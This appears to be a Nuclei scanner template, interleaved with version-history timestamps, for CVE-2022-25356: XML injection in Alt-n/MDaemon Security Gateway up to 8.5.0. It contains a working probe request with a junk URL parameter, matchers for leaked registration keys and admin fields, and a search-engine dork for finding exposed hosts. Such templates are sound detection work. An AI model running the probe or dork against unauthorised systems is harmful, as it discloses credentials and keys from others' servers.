2022-10-07 10:49:09 +00:00
id : CVE-2022-25356
info :
2023-04-07 16:10:57 +00:00
name : Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection
2022-10-07 10:49:09 +00:00
author : Akincibor
severity : medium
description : |
2023-04-07 16:10:57 +00:00
Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys.
2022-10-07 10:49:09 +00:00
reference :
2022-10-07 12:30:07 +00:00
- https://www.swascan.com/security-advisory-alt-n-security-gateway/
2022-10-07 12:49:38 +00:00
- https://www.altn.com/Products/SecurityGateway-Email-Firewall/
- https://www.swascan.com/security-blog/
2023-04-07 16:10:57 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-25356
2022-10-07 10:49:09 +00:00
classification :
2022-10-07 12:49:38 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
2022-10-07 10:49:09 +00:00
cve-id : CVE-2022-25356
2022-10-07 12:49:38 +00:00
cwe-id : CWE-91
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:*
epss-score : 0.00389
2022-10-07 10:49:09 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-01-24 10:09:42 +00:00
google-query : inurl:"/SecurityGateway.dll"
2023-06-04 08:13:42 +00:00
verified : true
2022-10-07 12:26:06 +00:00
tags : cve,cve2022,altn,gateway,xml,injection
2022-10-07 10:49:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-07 10:49:09 +00:00
- method : GET
path :
- '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'
matchers-condition : and
matchers :
- type : word
part : body
words :
- "Exception: Error while [Loading XML"
- "<RegKey>"
- "<IsAdmin>"
condition : and
- type : status
status :
- 200